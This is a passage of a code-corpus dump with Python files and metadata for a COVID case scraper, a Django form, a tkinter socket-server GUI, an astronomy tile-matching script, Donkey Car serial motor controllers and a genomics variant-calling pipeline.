URL may be incorrect or field names may have changed.\")\n\n# Loading population data to estimate case counts\nsan_antonio_pop_data_path = os.path.abspath(\"./san_antonio_pop_by_zip.csv\")\nsan_antonio_pop_data_file = open(san_antonio_pop_data_path, 'r')\nsan_antonio_pop_data_file.readline() # Get rid of header\n\nzip_code_pop_dict = {}\nfor line in san_antonio_pop_data_file:\n\tvalues = line.strip().split(',')\n\tzip_code, pop = values[1], values[7]\n\tzip_code_pop_dict[zip_code] = int(pop)\n\nsan_antonio_pop_data_file.close()\n\nzip_codes = [] # List of zip codes\ncase_counts = [] # List of case counts\n\nfor zip_json in all_zip_json:\n\tcases_per_100k = zip_json[u'attributes'][san_antonio_case_field]\n\tzip_code = zip_json[u'attributes'][u'ZIP_CODE']\t\n\tif zip_code in zip_code_pop_dict:\n\t\tcase_count = int(round(cases_per_100k*zip_code_pop_dict[zip_code]/100000))\n\t\tcase_counts.append(case_count)\n\t\tzip_codes.append(zip_code)\n\n# ===========================================\n# Store previous data in dictionary\n# ===========================================\n\nus_cases_rel_scripts_path = os.path.abspath(\"../processed_data/cases/US\") # Path to data relative to scripts\nprev_data_fpath = \"%s/bexar-county_cases.csv\" % us_cases_rel_scripts_path\nprev_data_file = open(prev_data_fpath, 'r')\nheader = prev_data_file.readline().strip().split(',')\n\n# IMPORTANT: Only append new data if date isn't already there\nquoted_date = parse_data_utils.date_string_to_quoted(date)\n\nif quoted_date in header:\n\tprev_data_file.close()\n\tsys.exit(\"This date has already been updated. May need to check if multiple updates were made in the same day.\")\n\ndata = {} # Keys are zip codes, values are lists of case counts\n\nfor row in prev_data_file:\n\tvalues = row.strip().split(',')\n\tzip_code = values[0]\n\tcase_counts_prev = values[1:]\n\tdata[zip_code] = case_counts_prev\n\nprev_data_file.close()\n\n# ===========================================\n# Add today's data and overwrite .csv\n# ===========================================\n\nnum_dates = len(header) - 1 # Excludes today\n\nfor zip_code, case_count in zip(zip_codes, case_counts):\n\tquoted_zip_code = '\"%s\"' % zip_code\n\tif quoted_zip_code in data:\n\t\tdata[quoted_zip_code].append(str(case_count))\n\telse: # New zip code\n\t\tdata[quoted_zip_code] = ['NA'] * (num_dates)\n\t\tdata[quoted_zip_code].append(str(case_count))\n\n# Missing zip codes\nfor zip_code in data:\n\tif len(data[zip_code]) < (num_dates + 1):\n\t\tdata[zip_code].append(\"NA\")\n\n# Make sure everything has the same length\n# (There might be duplicates!)\nfor zip_code in data:\n\tif len(data[zip_code]) != (num_dates + 1):\n\t\tsys.exit(\"ERROR: Inconsistency in number of data points for zip code %s\" % zip_code)\n\n# Overwrite csv\ndata_file = open(prev_data_fpath, 'w')\n\nheader.append(quoted_date)\ndata_file.write(','.join(header) + \"\\n\")\nsorted_zip_codes = sorted(data.keys())\n\nfor zip_code in sorted_zip_codes:\n\tdata_file.write('%s,' % zip_code)\n\tdata_file.write(','.join(data[zip_code]) + \"\\n\")\n\ndata_file.close()\n", "sub_path": "scripts/bexar-county_scrape.py", "file_name": "bexar-county_scrape.py", "file_ext": "py", "file_size_in_byte": 4077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.date", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.datetime.now", 
"line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "parse_data_utils.date_string_to_quoted", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "288396794", "text": "# coding=utf-8\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django import forms\n\nfrom solotodo.models import Product\n\n\nclass BudgetCreationForm(forms.Form):\n name = forms.CharField(max_length=255, label='Nombre')\n initial_product = forms.ModelChoiceField(\n queryset=Product.objects.all(), required=False,\n widget=forms.HiddenInput)\n next_url = forms.CharField(required=False, widget=forms.HiddenInput)\n\n def __init__(self, *args, **kwargs):\n super(BudgetCreationForm, self).__init__(*args, **kwargs)\n\n helper = FormHelper()\n helper.form_class = 'form-horizontal ' \\\n 'form_without_actions_decoration ' \\\n 'with_margin_top'\n helper.form_method = 'post'\n helper.form_action = '.'\n helper.add_input(Submit('submit', u'Crear cotización'))\n\n self.helper = helper\n", "sub_path": "hardware/forms/budget_creation_form.py", "file_name": "budget_creation_form.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.Form", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "solotodo.models.Product.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "solotodo.models.Product.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "solotodo.models.Product", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.HiddenInput", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.HiddenInput", "line_number": 14, "usage_type": "attribute"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 19, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "567406537", "text": "# https://pythonprogramming.net/python-3-tkinter-basics-tutorial/\nimport logging\nimport socket\nfrom queue import Queue\nfrom threading import Thread\nfrom tkinter import *\n\nfrom labo05.demo_networking.clientserver8.server.server import SommenServer\n\n\nclass ServerWindow(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.init_window()\n 
self.server = None\n self.thread_listener_queue = None\n self.init_messages_queue()\n\n\n\n # Creation of init_window\n def init_window(self):\n # changing the title of our master widget\n self.master.title(\"Server\")\n\n # allowing the widget to take the full space of the root window\n self.pack(fill=BOTH, expand=1)\n\n Label(self, text=\"Server log messages:\").grid(row=0)\n self.scrollbar = Scrollbar(self, orient=VERTICAL)\n self.lstnumbers = Listbox(self, yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.lstnumbers.yview)\n\n self.lstnumbers.grid(row=1, column=0, sticky=N + S + E + W)\n self.scrollbar.grid(row=1, column=1, sticky=N + S)\n\n self.btn_text = StringVar()\n self.btn_text.set(\"Start server\")\n self.buttonServer = Button(self, textvariable=self.btn_text, command=self.start_stop_server)\n self.buttonServer.grid(row=3, column=0, columnspan=2, pady=(5, 5), padx=(5, 5), sticky=N + S + E + W)\n\n Grid.rowconfigure(self, 1, weight=1)\n Grid.columnconfigure(self, 0, weight=1)\n\n\n def start_stop_server(self):\n if self.server is not None:\n self.__stop_server()\n else:\n self.__start_server()\n\n def __stop_server(self):\n self.server.stop_server()\n self.server = None\n logging.info(\"Server stopped\")\n self.btn_text.set(\"Start server\")\n\n def __start_server(self):\n self.server = SommenServer(socket.gethostname(), 9999, self.messages_queue)\n self.server.init_server()\n self.server.start() # place this in a thread!\n logging.info(\"Server started\")\n self.btn_text.set(\"Stop server\")\n\n def init_messages_queue(self):\n self.messages_queue = Queue()\n self.thread_listener_queue = Thread(target=self.print_messages_from_queue, name=\"Queue_listener_thread\", daemon=True)\n self.thread_listener_queue.start()\n\n def print_messages_from_queue(self):\n message = self.messages_queue.get()\n while message != \"CLOSE_SERVER\":\n self.lstnumbers.insert(END, message)\n self.messages_queue.task_done()\n message = self.messages_queue.get()", "sub_path": "server(demo)/gui_server.py", "file_name": "gui_server.py", "file_ext": "py", "file_size_in_byte": 2651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.info", "line_number": 56, "usage_type": "call"}, {"api_name": "labo05.demo_networking.clientserver8.server.server.SommenServer", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 67, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "574236940", "text": "import numpy as np\nimport shapely.geometry as geometry\nimport easyaccess as ea\n\ncon=ea.connect()\n\nq2='SELECT f.RA_CENT,f.DEC_CENT,f.RAC1,f.RAC2,f.RAC3,f.RAC4,f.DECC1,f.DECC2,f.DECC3,f.DECC4,f.ID,d.TILENAME FROM RUMBAUGH.Y3A1_TILENAMES_LIST d,DES_ADMIN.Y3A1_COADDTILE_GEOM f WHERE d.tilename=f.tilename'\n\nTDF=con.query_to_pandas(q2)\n\nboxes={TDF['TILENAME'][i]: geometry.MultiPoint(list(np.array([[TDF['RAC1'][i],TDF['DECC1'][i]],[TDF['RAC2'][i],TDF['DECC2'][i]],[TDF['RAC3'][i],TDF['DECC3'][i]],[TDF['RAC4'][i],TDF['DECC4'][i]]]))).convex_hull for i in np.arange(0,np.shape(TDF)[0])}\n\nTDFtilenames,TDFrac,TDFdecc=np.array(TDF['TILENAME']),np.array(TDF['RA_CENT']),np.array(TDF['DEC_CENT'])
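\n\n# Descriptive note (added): each entry in 'boxes' above is a convex-hull polygon for one\n# DES tile footprint; the matching loop below appears to sort nearby tiles by distance to\n# tile centre and walk them until a footprint contains the source (the 'foundbox' flag).\nqm='SELECT * from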
RUMBAUGH.SDSSPOSS_HPIX'\nMDF=con.query_to_pandas(qm)\n\noutcr=np.zeros((np.shape(MDF)[0],np.shape(MDF)[1]),dtype='|S20')\noutcr[:,0],outcr[:,1],outcr[:,2]=np.array(MDF['SP_ROWNUM']),np.array(MDF['RA']),np.array(MDF['DEC'])\n\nfor i in range(0,np.shape(MDF)[0]):\n curmra,curmdec=MDF['RA'][i],MDF['DEC'][i]\n gclose=np.where(np.sqrt((TDFrac-curmra)**2+(TDFdecc-curmdec)**2)<1.5)[0]\n gs=np.argsort(np.sqrt((TDFrac[gclose]-curmra)**2+(TDFdecc[gclose]-curmdec)**2))\n foundbox,cnt=False,-1\n while ((not(foundbox))&(cnt 0:\n pulse = map_range(throttle,\n 0, self.MAX_THROTTLE, \n self.zero_pulse, self.max_pulse)\n else:\n pulse = map_range(throttle,\n self.MIN_THROTTLE, 0, \n self.min_pulse, self.zero_pulse)\n\n sys.stdout.flush()\n self.controller.set_pulse(pulse)\n return '123'\n\n\nclass SerialInterface:\n ''' \n We need one instance of this class per device to control connection\n '''\n\n ser = None\n logfile = None\n\n def log_serial(self):\n '''\n We must read messages from serial device else we may get blocked io\n '''\n interrupted = False\n while not interrupted:\n try:\n if self.ser is None or self.ser.in_waiting <= 0:\n time.sleep(0.01)\n else:\n line=self.ser.readline()\n if len(line):\n if self.log:\n self.logfile.write(line)\n else:\n print(line)\n\n except (serial.SerialException, serial.serialutil.SerialException,\n serial.SerialTimeoutException):\n time.sleep(0.01)\n pass #Try again\n\n except KeyboardInterrupt:\n interrupted = True\n cleanup()\n raise\n\n\n #def __init__(self, device='/dev/ttyACM0', rate=115200, log=False):\n def __init__(self, device='/dev/serial0', rate=115200, log=False):\n import tempfile\n from threading import Thread\n\n self.log = log\n #Create a logfile\n if log and self.logfile is None:\n self.logfile = tempfile.NamedTemporaryFile(prefix='ser_', dir='.', delete=False)\n\n # Initialise the serial connection from RPi to its controller\n if self.ser is None:\n #Don't open the port yet\n self.ser = serial.Serial()\n self.ser.port = device\n self.ser.baudrate = rate\n self.ser.timeout = 0\n self.inWrite = False\n self.firstTime = True\n print(\"Serial device to open\", device)\n self.openDevice()\n\n else:\n print(\"Serial is already open\")\n\n atexit.register(self.cleanup)\n\n\n def openDevice(self):\n #devices = [self.ser.port, '/dev/ttyACM0', '/dev/ttyACM1']\n #for device in devices:\n try:\n #self.ser.port = device\n self.ser.open()\n #Wait for arduino to reset\n time.sleep(2)\n if not self.ser.is_open:\n self.ser.close()\n else:\n #Read everything already in pipe and ignore\n self.ser.flushInput()\n #self.ser.reset_input_buffer()\n return\n\n except serial.SerialException:\n print('Failed to open ' + device)\n\n # If we reached here, none of the ports was opened\n raise serial.SerialException\n\n def send_msg(self, msg):\n # Do this for only one channel\n if self.ser is None:\n print(\"Serial device doesn't exist\")\n return\n\n #if not self.ser.is_open:\n # print(\"Serial device is not open\")\n # self.openDevice()\n\n if not self.ser.is_open:\n print(\"Serial device could not be opened\")\n return\n\n while self.inWrite:\n time.sleep(0.001)\n self.inWrite = True\n try:\n if self.firstTime:\n # We no longer have to do this\n # Ask serial to send debug messages\n #self.ser.write('d\\n'.encode())\n #self.ser.flush()\n #self.ser.write('m=2\\n'.encode())\n #self.ser.flush()\n #self.ser.write('n\\n'.encode())\n #self.ser.flush()\n self.firstTime = False\n self.ser.write(msg.encode())\n self.ser.flush()\n\n except serial.SerialException:\n print(\"Failed to 
write to Serial device\")\n\n self.inWrite = False\n\n\n def cleanup(self):\n if self.logfile is not None:\n self.logfile.close()\n self.ser.close()\n\n\nclass Differential_PassThrough_Controller:\n ''' \n Generic Differential Pass Through Motor Controller \n For differential drive cars you need one controller for each side.\n PassThrough means the RPi will pass it to its controller via serial interface\n '''\n\n #This is shared between instances\n serialInterf = None\n\n #def __init__(self, motor_num, device='/dev/ttyACM0', rate=115200):\n def __init__(self, motor_num, device='/dev/serial0', rate=115200):\n # Initialise the serial connection from RPi to its controller\n if Differential_PassThrough_Controller.serialInterf is None:\n Differential_PassThrough_Controller.serialInterf = SerialInterface(device, rate)\n\n #Motor_num 0 for left, 1 for right\n if motor_num == 0 or motor_num == 1:\n self.motor_num = motor_num\n else:\n raise Exception(\"invalid motor number\")\n\n self.throttle = 0\n atexit.register(self.set_pulse, pulse=0)\n \n\n def set_pulse(self, pulse):\n '''\n Required for calibration\n '''\n self.turn(pulse)\n \n\n def turn(self, throttle):\n '''\n Update the speed of the motor\n '''\n \n # Direction can be inferred by + or - so use 8bit range\n #throttle = int(map_range(abs(speed), -1, 1, -127, 127))\n if throttle == self.throttle:\n return\n\n self.throttle = throttle\n if self.motor_num == 0:\n msg = \"L=\"\n else:\n msg = \"R=\"\n msg += str(self.throttle) + '\\n'\n #print('\\n' + msg)\n Differential_PassThrough_Controller.serialInterf.send_msg(msg)\n\n \n def test(self, seconds=.5):\n speeds = [-.5, -1, -.5, 0, .5, 1, 0]\n for s in speeds:\n self.turn(s)\n time.sleep(seconds)\n print('speed: %s, throttle: %s' % (s, self.throttle))\n print('motor #%s test complete' % self.motor_num)\n \n\nclass PassThrough_Controller:\n ''' \n Pass control over to motor controller over serial connection.
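\n Channel 0 carries throttle ('T=<value>') and channel 1 carries steering\n ('S=<value>'); set_pulse() forwards the value verbatim over the shared\n serial link.\n\n Illustrative sketch (added; assumes the default '/dev/serial0' exists):\n throttle = PassThrough_Controller(channel=0)\n throttle.set_pulse(300) # sent as 'T=300'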
\n '''\n\n serialInterf = None\n\n #def __init__(self, channel, device='/dev/ttyACM0', rate=115200):\n def __init__(self, channel, device='/dev/serial0', rate=115200):\n # Initialise the serial connection from RPi to its controller\n if PassThrough_Controller.serialInterf is None:\n PassThrough_Controller.serialInterf = SerialInterface(device, rate)\n\n if channel == 0 or channel == 1:\n self.channel = channel\n else:\n raise Exception(\"invalid channel\")\n\n self.lastVal = 0\n\n #channel 0 for throttle and 1 for steering\n atexit.register(self.set_pulse, pulse=0)\n \n\n def set_pulse(self, pulse):\n #if pulse == self.lastVal:\n # return\n if self.channel == 0:\n msg = \"T=\"\n else:\n msg = \"S=\"\n msg += str(pulse) + '\\n'\n #print('\\n' + msg)\n PassThrough_Controller.serialInterf.send_msg(msg)\n\n\nclass Adafruit_Motor_Hat_Controller:\n ''' \n Adafruit DC Motor Controller \n For differential drive cars you need one controller for each motor.\n '''\n def __init__(self, motor_num):\n from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n import atexit\n \n self.FORWARD = Adafruit_MotorHAT.FORWARD\n self.BACKWARD = Adafruit_MotorHAT.BACKWARD\n self.mh = Adafruit_MotorHAT(addr=0x60) \n \n self.motor = self.mh.getMotor(motor_num)\n self.motor_num = motor_num\n \n atexit.register(self.turn_off_motors)\n self.speed = 0\n self.throttle = 0\n \n\n def turn_off_motors(self):\n self.mh.getMotor(self.motor_num).run(Adafruit_MotorHAT.RELEASE)\n\n\n def turn(self, speed):\n '''\n Update the speed of the motor where 1 is full forward and\n -1 is full backwards.\n '''\n if speed > 1 or speed < -1:\n raise ValueError( \"Speed must be between 1(forward) and -1(reverse)\")\n \n self.speed = speed\n self.throttle = int(map_range(abs(speed), -1, 1, -255, 255))\n \n if speed > 0: \n self.motor.run(self.FORWARD)\n else:\n self.motor.run(self.BACKWARD)\n \n self.motor.setSpeed(self.throttle)\n \n \n def test(self, seconds=.5):\n speeds = [-.5, -1, -.5, 0, .5, 1, 0]\n for s in speeds:\n self.turn(s)\n time.sleep(seconds)\n print('speed: %s throttle: %s' % (self.speed, self.throttle))\n print('motor #%s test complete'% self.motor_num)\n \n\n", "sub_path": "donkey/actuators.py", "file_name": "actuators.py", "file_ext": "py", "file_size_in_byte": 11388, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Adafruit_PCA9685.PCA9685", "line_number": 50, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 140, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 149, "usage_type": "attribute"}, {"api_name": "serial.serialutil", "line_number": 149, "usage_type": "attribute"}, {"api_name": "serial.SerialTimeoutException", "line_number": 150, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 151, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 168, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 173, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 185, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 204, "usage_type": "attribute"}, {"api_name": "serial.SerialException", "line_number": 208, 
"usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 225, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 241, "usage_type": "attribute"}, {"api_name": "{'tempfile': 'tempfile', 'Thread': 'threading.Thread'}", "line_number": 267, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 276, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 310, "usage_type": "call"}, {"api_name": "{'tempfile': 'tempfile', 'Thread': 'threading.Thread'}", "line_number": 326, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 336, "usage_type": "call"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.FORWARD", "line_number": 360, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 360, "usage_type": "name"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.BACKWARD", "line_number": 361, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 361, "usage_type": "name"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 362, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 367, "usage_type": "call"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT.RELEASE", "line_number": 373, "usage_type": "attribute"}, {"api_name": "Adafruit_MotorHAT.Adafruit_MotorHAT", "line_number": 373, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}]} +{"seq_id": "216451011", "text": "#! /usr/bin/python3\nimport os\nimport sys\nimport glob\nimport time\nimport shutil\nimport logging\nimport argparse\nimport subprocess\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom multiprocessing import Pool\nfrom pyamd.bbduk import QualCheck\nfrom pyamd.alignment import Bwa\nfrom pyamd.alignment import Bowtie\nfrom pyamd.alignment import BBMap\nfrom pyamd.alignment import Snap\nfrom pyamd.samtools import Samtools\nfrom pyamd.gatk import GenAnTK\nfrom pyamd.gatk import Picard\nfrom pyamd.kestrel import KestrelVar\n#from pyamd.annotater import Annotate\nfrom pyamd.kestrel import kes_runner\nfrom pyamd.summarize import Summary\nfrom pyamd.prepinputs import Prepper\nfrom pyamd.parsers.vcf import Vcf\n\ndef main(arguments):\n bbduk_path = arguments[0]\n alinger_path = arguments[1]\n smt_path = arguments[2]\n bft_path = arguments[3]\n gatk_path = arguments[4]\n rone_path = arguments[5]\n rtwo_path = arguments[6]\n ref_path = arguments[7]\n adp_path = arguments[8]\n bed_path = arguments[9]\n out_dir = arguments[10]\n aligner = arguments[11]\n pic_path = arguments[12]\n sam_name = arguments[13]\n voi_path = arguments[14]\n java_path = arguments[15]\n #Setup logging\n #Get logger for main method\n main_logger = logging.getLogger('Kookaburra.{0}'.format(sam_name))\n #Check if files are present\n #sam_name = config[samples].sample\n #rone_path = config[samples].files[0]\n #rtwo_path = config[samples].files[1]\n out_path = '{0}/{1}'.format(os.path.abspath(out_dir), sam_name)\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n #main_logger.info('Analyzing sample : {0}'.format(sam_name))\n\n\n if not os.path.exists(rone_path):\n raise FileNotFoundException('Forward read not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(rtwo_path):\n raise FileNotFoundException('Reverse read not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(ref_path):\n raise FileNotFoundException('Reference fasta file not found; Exiting MARs')\n sys.exit()\n\n if not 
os.path.exists(adp_path):\n raise FileNotFoundException('Adpater sequence not found; Exiting MARs')\n sys.exit()\n\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n\n #Create completion folder\n completion_path = '{0}/completion'.format(out_path)\n if not os.path.exists(completion_path):\n os.mkdir(completion_path)\n\n #Call Bbduk\n main_logger.debug('Running BBDuk')\n if os.path.exists('{0}/bbduk.rt'.format(completion_path)):\n brone = os.path.splitext(os.path.basename(rone_path))[0]\n brtwo = os.path.splitext(os.path.basename(rtwo_path))[0]\n rone_path = '{0}/{1}/{2}_cleaned.fq'.format(out_path, 'CleanedFastq', brone)\n rtwo_path = '{0}/{1}/{2}_cleaned.fq'.format(out_path, 'CleanedFastq', brtwo)\n main_logger.debug('Skipping BBDuk')\n bret = 0\n else:\n bbduk = QualCheck(bbduk_path, adp_path, out_path, java_path)\n rone_path, rtwo_path, bret = bbduk.bbduk(rone_path, rtwo_path)\n if bret == 0:\n Path('{0}/bbduk.rt'.format(completion_path)).touch()\n if bret != 0:\n raise RuntimeError('BBDuk failed to complete; Exiting MARs')\n else:\n main_logger.debug('BBDuk completed')\n\n if aligner == 'bwa':\n #Call BWA\n main_logger.debug('Running BWA')\n if os.path.exists('{0}/align.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n main_logger.debug('Skipping BWA')\n else:\n bwa = Bwa(alinger_path, out_path, ref_path)\n sam_path, mret = bwa.bwamem(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('Bwa mem failed to complete; Exiting MARs')\n else:\n main_logger.debug('BWA completed')\n\n elif aligner == 'bowtie2':\n #Call Bowtie2\n main_logger.debug('Running Bowtie2')\n if os.path.exists('{0}/aling.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n main_logger.debug('Skipping Bowtie2')\n else:\n bowtie = Bowtie(alinger_path, out_path, ref_path)\n sam_path, mret = bowtie.bowtie(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('Bowtie2 failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bowtie2 completed')\n\n elif aligner == 'snap':\n #Call Snap\n main_logger.debug('Running Snap')\n snap = Snap(alinger_path, out_path, ref_path)\n sam_path, mret = snap.snap(rone_path, rtwo_path)\n if mret != 0:\n raise RuntimeError('Snap failed to complete; Exiting MARs')\n else:\n main_logger.debug('Snap completed')\n\n elif aligner == 'bbmap':\n #Call Bbmap\n main_logger.debug('Running BBMap')\n if os.path.exists('{0}/aling.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n else:\n bbmap = BBMap(alinger_path, out_path, ref_path)\n sam_path, mret = bbmap.bbmap(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('BBMap failed to complete; Exitinign MARs')\n else:\n main_logger.debug('BBMap completed')\n\n\n #Fix mate information, sort files and add read groups\n varengine = Samtools(smt_path, bft_path, out_path)\n if os.path.exists('{0}/fixmate.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(sam_path))[0]\n bam_path = '{0}/{1}_fixmate.bam'.format(out_path, base)\n fret = 0\n main_logger.debug('Skipping fixmate')\n else:\n bam_path, fret = varengine.fixmate(sam_path)\n if fret == 0:\n Path('{0}/fixmate.rt'.format(completion_path)).touch()\n main_logger.debug('Running Samtools fixmate')\n if 
fret != 0:\n raise RuntimeError('Samtools fixmate failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools fixmate completed')\n\n if os.path.exists('{0}/sort.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(bam_path))[0]\n bam_path = '{0}/{1}_sorted.bam'.format(out_path, base)\n sret = 0\n main_logger.debug('Skipping sort')\n else:\n bam_path, sret = varengine.sort(bam_path)\n if sret == 0:\n Path('{0}/sort.rt'.format(completion_path)).touch()\n main_logger.debug('Running Samtools sort')\n if sret != 0:\n raise RuntimeError('Samtools sort failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools sort completed')\n\n rgadder = Picard(java_path, pic_path, out_path)\n if os.path.exists('{0}/readgroup.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(bam_path))[0]\n bam_path = '{0}/{1}_RG.bam'.format(out_path, base)\n aret = 0\n main_logger.debug('Skipping add read group')\n else:\n bam_path, aret = rgadder.picard(bam_path, sam_name)\n main_logger.debug('Running Picard AddOrReplaceReadGroups')\n if aret == 0:\n Path('{0}/readgroup.rt'.format(completion_path)).touch()\n if aret != 0:\n raise RuntimeError('Picard AddOrReplaceReadGroups failed to complete; Exiting MARs')\n else:\n main_logger.debug('Picard AddOrReplaceReadGroups completed')\n\n #Run samtools mpileup, bcftools index, call and stats to generate VCF files\n if os.path.exists('{0}/pileup.rt'.format(completion_path)):\n bcf_path = '{0}/variants.bcf'.format(out_path)\n pret = 0\n main_logger.debug('Skipping Pileup')\n else:\n bcf_path, pret = varengine.pileup(ref_path, bam_path)\n main_logger.debug('Running Samtools mpileup')\n if pret == 0:\n Path('{0}/pileup.rt'.format(completion_path)).touch()\n if pret != 0:\n raise RuntimeError('Samtools mpileup failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools mpileup completed')\n\n if os.path.exists('{0}/bcfindex.rt'.format(completion_path)):\n bret = 0\n main_logger.debug('Skipping Bcfindex')\n else:\n bret = varengine.bcfindex(bcf_path)\n main_logger.debug('Running Bcftools index')\n if bret == 0:\n Path('{0}/bcfindex.rt'.format(completion_path)).touch()\n if bret != 0:\n raise RuntimeError('Bcftools index failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bcftools index completed')\n\n if os.path.exists('{0}/bcfcall.rt'.format(completion_path)):\n vcf_path = '{0}/{1}_variants.vcf'.format(out_path, sam_name)\n bret = 0\n main_logger.debug('Skipping bcfcall')\n else:\n vcf_path, bret = varengine.bcftools(bcf_path, bed_path, sam_name)\n main_logger.debug('Running Bcftools call')\n if bret == 0:\n Path('{0}/bcfcall.rt'.format(completion_path)).touch()\n\n if bret != 0:\n raise RuntimeError('Bcftools call failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bcftools call completed')\n\n #if os.path.exists('{0}/stats.rt'.format())\n #stats_path, bret = varengine.bcfstats(vcf_path, ref_path)\n #main_logger.debug('Running Bcftools stats')\n #if bret != 0:\n # raise RuntimeError('Bcftools stats failed to complete; Exiting MARs')\n #else:\n # main_logger.debug('Bcftools stats completed')\n\n #Call GATK HaplotypeCaller to generate VCF files\n varcaller = GenAnTK(gatk_path, out_path, java_path)\n main_logger.debug('Running GATK HaplotypeCaller')\n if os.path.exists('{0}/gatk.rt'.format(completion_path)):\n gvcf_path = '{0}/{1}_variants_gatk.vcf'.format(out_path, sam_name)\n gret = 0\n main_logger.debug('Skipping GATK')\n else:\n gvcf_path, gret = varcaller.hapCaller(bam_path, 
